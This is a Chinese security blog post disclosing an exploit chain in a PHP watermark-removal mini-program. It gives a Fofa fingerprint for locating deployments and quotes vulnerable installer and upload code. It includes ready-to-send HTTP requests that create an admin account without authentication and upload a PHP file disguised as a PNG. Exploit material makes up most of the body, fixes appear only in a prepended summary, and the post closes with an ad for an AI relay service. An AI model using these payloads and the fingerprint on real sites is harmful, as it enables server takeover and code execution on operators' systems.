文章总结： 文档分析2026年某去水印小程序的安全漏洞，发现前台install目录未授权即可创建管理员账户（step=3参数绕过安装检测），后台course.php文件上传功能仅校验客户端MIME类型导致任意文件上传。攻击者可组合利用这两漏洞获取后台权限并上传恶意文件。建议删除install目录、加强身份验证、服务端校验文件类型与后缀。 综合评分： 78 文章分类： 漏洞分析,WEB安全,渗透测试,安全开发,解决方案

某2026最新去水印小程序文件上传漏洞组合拳

原创

Mstir Mstir

星悦安全

2026年6月16日 20:09 浙江

在小说阅读器读本章

去阅读

点击上方蓝字关注我们 并设为星标

0x00 前言

这个小程序支持涂抹去水印，接口可以自己对接自己的，前端首页文件里面修改自己接口的返回字段即可！源码技术栈：PHP7.4  数据库：mysql

Fofa指纹 :”去水印小程序后台”

0x01 前台未授权创建管理员账户

漏洞点位于 /install/index.php 中，只要install/目录仍可访问，即使系统已经安装，攻击者也可直接请求step=3分支创建新管理员账号。代码没有校验当前是否已有管理员、没有安装 token、没有会话绑定，也没有要求后台登录

// 检查是否已安装（仅在没有明确进行安装步骤时跳转）$db_config_file = INSTALL_PATH . '/../config/database.php';$requested_step = isset($_GET['step']) ? intval($_GET['step']) : (isset($_POST['step']) ? intval($_POST['step']) : 1);// 若正在执行 step=3（创建管理员），不跳转，必须让用户完成设置if ($requested_step != 3 && file_exists($db_config_file)) {    $config = @include $db_config_file;    if (is_array($config) && isset($config['db']) && !empty($config['db']['name']) && !empty($config['db']['user'])) {        // 检查是否已有管理员（真正安装完成才跳转）        $admin_check_file = INSTALL_PATH . '/../config/.installed';        if (file_exists($admin_check_file)) {            header('Location: ../admin/');            exit;        }    }}$error = '';$step = isset($_GET['step']) ? intval($_GET['step']) : 1;
// 处理表单提交if ($_SERVER['REQUEST_METHOD'] === 'POST') {    $step = isset($_POST['step']) ? intval($_POST['step']) : 1;    ......      } elseif ($step == 3) {        // 创建管理员        $username = trim($_POST['username']);      $password = $_POST['password'];      $confirm_password = $_POST['confirm_password'];
&nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;(empty($username) ||&nbsp;empty($password)) {&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;$error&nbsp;=&nbsp;'用户名和密码不能为空';&nbsp; &nbsp; &nbsp; }&nbsp;elseif&nbsp;($password&nbsp;!==&nbsp;$confirm_password) {&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;$error&nbsp;=&nbsp;'两次密码输入不一致';&nbsp; &nbsp; &nbsp; }&nbsp;elseif&nbsp;(strlen($password) <&nbsp;6) {&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;$error&nbsp;=&nbsp;'密码长度不能少于6位';&nbsp; &nbsp; &nbsp; }&nbsp;else&nbsp;{&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;// 读取配置&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;$config&nbsp;=&nbsp;include&nbsp;INSTALL_PATH .&nbsp;'/../config/database.php';
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;try&nbsp;{&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;$dsn&nbsp;=&nbsp;"mysql:host={$config['db']['host']};port={$config['db']['port']};dbname={$config['db']['name']};charset=utf8mb4";&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;$pdo&nbsp;=&nbsp;new&nbsp;PDO($dsn,&nbsp;$config['db']['user'],&nbsp;$config['db']['pass'], [&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;PDO::ATTR_ERRMODE&nbsp;=> PDO::ERRMODE_EXCEPTION,&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;]);
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;$salt&nbsp;=&nbsp;substr(md5(uniqid(rand(),&nbsp;true)),&nbsp;0,&nbsp;32);&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;$password_hash&nbsp;=&nbsp;md5(md5($password) .&nbsp;$salt);
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;$stmt&nbsp;=&nbsp;$pdo->prepare("INSERT INTO `w_admin` (`username`, `password`, `salt`, `created_at`) VALUES (?, ?, ?, NOW())");&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;$stmt->execute([$username,&nbsp;$password_hash,&nbsp;$salt]);
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;// 标记安装完成（避免再次进入安装时直接跳转，未设置管理员）&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;file_put_contents(INSTALL_PATH .&nbsp;'/../config/.installed',&nbsp;date('Y-m-d H:i:s'));
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;// 跳转到后台&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;header('Location: ../admin/');&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;exit;
&nbsp; &nbsp; &nbsp; &nbsp; }&nbsp;catch&nbsp;(PDOException&nbsp;$e) {&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;$error&nbsp;=&nbsp;'创建管理员失败: '&nbsp;.&nbsp;$e->getMessage();&nbsp; &nbsp; &nbsp; &nbsp; }&nbsp; &nbsp; &nbsp; }&nbsp; &nbsp; &nbsp; }

Payload(新增管理员):

POST /install/index.php HTTP/1.1Host: 127.0.0.1Content-Type: application/x-www-form-urlencoded
step=3&username=fast&password=fast123456&confirm_password=fast123456

然后直接拿着账号密码登录后台 fast | fast123456

0x02 后台任意文件上传漏洞

此漏洞可配合前台未授权创建管理员账户来组合拳.

位于 /admin/course.php 中的 handleIconUpload 方法使用客户端提供的 $file[‘type’] 判断 MIME，且未对后缀进行限制，导致文件上传漏洞产生.

<?php/**&nbsp;* 课程管理页面&nbsp;*/require_once&nbsp;ROOT_PATH .&nbsp;'/config/db.php';
$db&nbsp;=&nbsp;Database::getInstance();$msg&nbsp;=&nbsp;'';
// 处理文件上传function&nbsp;handleIconUpload($file)&nbsp;{&nbsp; &nbsp;&nbsp;if&nbsp;($file['error'] === UPLOAD_ERR_OK) {&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;$uploadDir&nbsp;= ROOT_PATH .&nbsp;'/uploads/course/';&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;(!is_dir($uploadDir)) {&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;mkdir($uploadDir,&nbsp;0755,&nbsp;true);&nbsp; &nbsp; &nbsp; &nbsp; }
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;$allowedTypes&nbsp;= ['image/jpeg',&nbsp;'image/png',&nbsp;'image/gif',&nbsp;'image/webp'];&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;$fileType&nbsp;=&nbsp;$file['type'];
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;(!in_array($fileType,&nbsp;$allowedTypes)) {&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;return&nbsp;['error'&nbsp;=>&nbsp;'只支持 JPG、PNG、GIF、WebP 格式的图片'];&nbsp; &nbsp; &nbsp; &nbsp; }
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;$extension&nbsp;=&nbsp;pathinfo($file['name'], PATHINFO_EXTENSION);&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;$newFilename&nbsp;=&nbsp;'icon_'&nbsp;.&nbsp;time() .&nbsp;'_'&nbsp;.&nbsp;rand(1000,&nbsp;9999) .&nbsp;'.'&nbsp;.&nbsp;$extension;&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;$targetPath&nbsp;=&nbsp;$uploadDir&nbsp;.&nbsp;$newFilename;
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;(move_uploaded_file($file['tmp_name'],&nbsp;$targetPath)) {&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;return&nbsp;'/uploads/course/'&nbsp;.&nbsp;$newFilename;&nbsp; &nbsp; &nbsp; &nbsp; }&nbsp;else&nbsp;{&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;return&nbsp;['error'&nbsp;=>&nbsp;'文件上传失败'];&nbsp; &nbsp; &nbsp; &nbsp; }&nbsp; &nbsp; }&nbsp; &nbsp;&nbsp;return&nbsp;null;}
// 处理表单提交 - 添加/编辑课程if&nbsp;($_SERVER['REQUEST_METHOD'] ===&nbsp;'POST'&nbsp;&&&nbsp;isset($_POST['save_course'])) {&nbsp; &nbsp;&nbsp;$title&nbsp;=&nbsp;trim($_POST['title']);&nbsp; &nbsp;&nbsp;$subtitle&nbsp;=&nbsp;trim($_POST['subtitle']);&nbsp; &nbsp;&nbsp;$description&nbsp;=&nbsp;trim($_POST['description']);&nbsp; &nbsp;&nbsp;$icon&nbsp;=&nbsp;trim($_POST['icon']);&nbsp; &nbsp;&nbsp;$content&nbsp;=&nbsp;trim($_POST['content']);&nbsp; &nbsp;&nbsp;$sort&nbsp;=&nbsp;intval($_POST['sort']);&nbsp; &nbsp;&nbsp;$status&nbsp;=&nbsp;isset($_POST['status']) ?&nbsp;1&nbsp;:&nbsp;0;
&nbsp; &nbsp;&nbsp;// 处理文件上传&nbsp; &nbsp;&nbsp;if&nbsp;(isset($_FILES['icon_file']) &&&nbsp;$_FILES['icon_file']['error'] !== UPLOAD_ERR_NO_FILE) {&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;$uploadResult&nbsp;=&nbsp;handleIconUpload($_FILES['icon_file']);&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;(is_array($uploadResult) &&&nbsp;isset($uploadResult['error'])) {&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;$msg&nbsp;=&nbsp;$uploadResult['error'];&nbsp; &nbsp; &nbsp; &nbsp; }&nbsp;elseif&nbsp;($uploadResult) {&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;$icon&nbsp;=&nbsp;$uploadResult;&nbsp; &nbsp; &nbsp; &nbsp; }&nbsp; &nbsp; }
&nbsp; &nbsp;&nbsp;if&nbsp;(empty($msg)) {&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;(empty($title)) {&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;$msg&nbsp;=&nbsp;'课程标题不能为空';&nbsp; &nbsp; &nbsp; &nbsp; }&nbsp;else&nbsp;{&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;$course_id&nbsp;=&nbsp;isset($_POST['course_id']) ?&nbsp;intval($_POST['course_id']) :&nbsp;0;
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;($course_id&nbsp;>&nbsp;0) {&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;// 更新课程&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;$db->update('w_course', [&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;'title'&nbsp;=>&nbsp;$title,&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;'subtitle'&nbsp;=>&nbsp;$subtitle,&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;'description'&nbsp;=>&nbsp;$description,&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;'icon'&nbsp;=>&nbsp;$icon,&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;'content'&nbsp;=>&nbsp;$content,&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;'sort'&nbsp;=>&nbsp;$sort,&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;'status'&nbsp;=>&nbsp;$status&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; ],&nbsp;'id = ?', [$course_id]);&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;$msg&nbsp;=&nbsp;'课程更新成功！';&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }&nbsp;else&nbsp;{&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;// 添加课程&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;$db->insert('w_course', [&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;'title'&nbsp;=>&nbsp;$title,&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;'subtitle'&nbsp;=>&nbsp;$subtitle,&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;'description'&nbsp;=>&nbsp;$description,&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;'icon'&nbsp;=>&nbsp;$icon,&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;'content'&nbsp;=>&nbsp;$content,&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;'sort'&nbsp;=>&nbsp;$sort,&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;'status'&nbsp;=>&nbsp;$status,&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;'count'&nbsp;=>&nbsp;0,&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;'created_at'&nbsp;=>&nbsp;date('Y-m-d H:i:s')&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; ]);&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;$msg&nbsp;=&nbsp;'课程添加成功！';&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;// 记录日志&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;$db->insert('w_use_log', [&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;'type'&nbsp;=>&nbsp;'course',&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;'content'&nbsp;=>&nbsp;$course_id&nbsp;>&nbsp;0&nbsp;?&nbsp;'更新课程: '&nbsp;.&nbsp;$title&nbsp;:&nbsp;'添加课程: '&nbsp;.&nbsp;$title,&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;'ip'&nbsp;=>&nbsp;$_SERVER['REMOTE_ADDR'] ??&nbsp;'',&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;'created_at'&nbsp;=>&nbsp;date('Y-m-d H:i:s')&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; ]);&nbsp; &nbsp; &nbsp; &nbsp; }&nbsp; &nbsp; }}

Payload:

POST /admin/?action=course HTTP/1.1Host: 127.0.0.1Content-Length: 404Cache-Control: max-age=0Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=----WebKitFormBoundary24LEG5fdzcWBLdCHAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7Cookie: a8c4ed34e706ef9c01b4fa71bead4d4a=ozb7freznaMBUJ0zKBBiM_85OnuLvbQsXBHH-I-a1mU.KM2yn7au44noGRRl9HoH2oHwPfs; PHPSESSID=fg3btbilumg36lobm2lg46769tConnection: close
------WebKitFormBoundary24LEG5fdzcWBLdCHContent-Disposition: form-data; name="save_course"
1------WebKitFormBoundary24LEG5fdzcWBLdCHContent-Disposition: form-data; name="title"
upload-poc------WebKitFormBoundary24LEG5fdzcWBLdCHContent-Disposition: form-data; name="icon_file"; filename="aaa.php"Content-Type: image/png
<?php&nbsp;phpinfo();?>------WebKitFormBoundary24LEG5fdzcWBLdCH--

0x03 AI 漏洞挖掘

标签:代码审计，0day，渗透测试，系统，通用，0day，闲鱼，交易所

本漏洞完全由星悦AI中转提供的GPT5.5挖掘.

今天6.16日全晚GPT所有模型 0.01x 倍率使用，随便Xhigh，无速率限制

https://www.xyusec.com/

新用户还可以进群领取5$

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，文章作者和本公众号不承担任何法律及连带责任，望周知！！!****

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：星悦安全 Mstir Mstir《某2026最新去水印小程序文件上传漏洞组合拳》